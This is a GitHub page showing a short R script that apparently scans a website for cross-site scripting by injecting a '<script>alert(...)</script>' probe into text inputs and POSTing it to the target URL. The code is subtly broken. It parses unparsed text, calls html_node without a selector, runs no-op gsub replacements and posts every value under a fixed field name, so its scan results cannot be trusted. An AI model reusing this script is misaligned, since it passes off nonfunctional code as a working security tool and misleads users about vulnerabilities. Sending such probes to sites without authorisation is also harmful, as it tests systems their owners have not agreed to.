-
Notifications
You must be signed in to change notification settings - Fork 3
/
xss-vul-scan.r
56 lines (45 loc) · 1.61 KB
/
xss-vul-scan.r
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
library(httr)
library(rvest)
# specify the URL to scan
url <- "http://example.com"
# define a function to check for XSS vulnerabilities
check_xss <- function(url) {
# send a GET request to the URL
res <- GET(url)
# extract the response HTML
html <- content(res, "text")
# scrape the HTML for input and script tags
inputs <- html_nodes(html, "input[type='text'], input[type='search'], textarea")
scripts <- html_nodes(html, "script")
# check each input tag for XSS vulnerabilities
for(input in inputs) {
# generate an XSS payload for the input
payload <- sprintf("<script>alert('XSS vulnerability found on %s!');</script>", url)
# insert the payload into the input
input <- html_node(input)
input <- html_attr(input, "value")
input <- gsub("<", "<", input)
input <- gsub(">", ">", input)
input <- paste0(input, payload)
# send a POST request with the modified input
res <- POST(url, body = list(input = input))
# check if the payload was executed
if(grepl("XSS vulnerability found on", content(res, "text"))) {
cat("XSS vulnerability found on", url, "in input:", input, "\n")
}
}
# check each script tag for XSS vulnerabilities
for(script in scripts) {
# get the script contents
script <- html_node(script)
script <- html_text(script)
# check for a script injection vulnerability
if(grepl("<script>", script)) {
cat("XSS vulnerability found on", url, "in script:", script, "\n")
}
}
}
# scan the URL for XSS vulnerabilities
cat("Scanning", url, "for XSS vulnerabilities...\n")
check_xss(url)
cat("Scan complete.\n")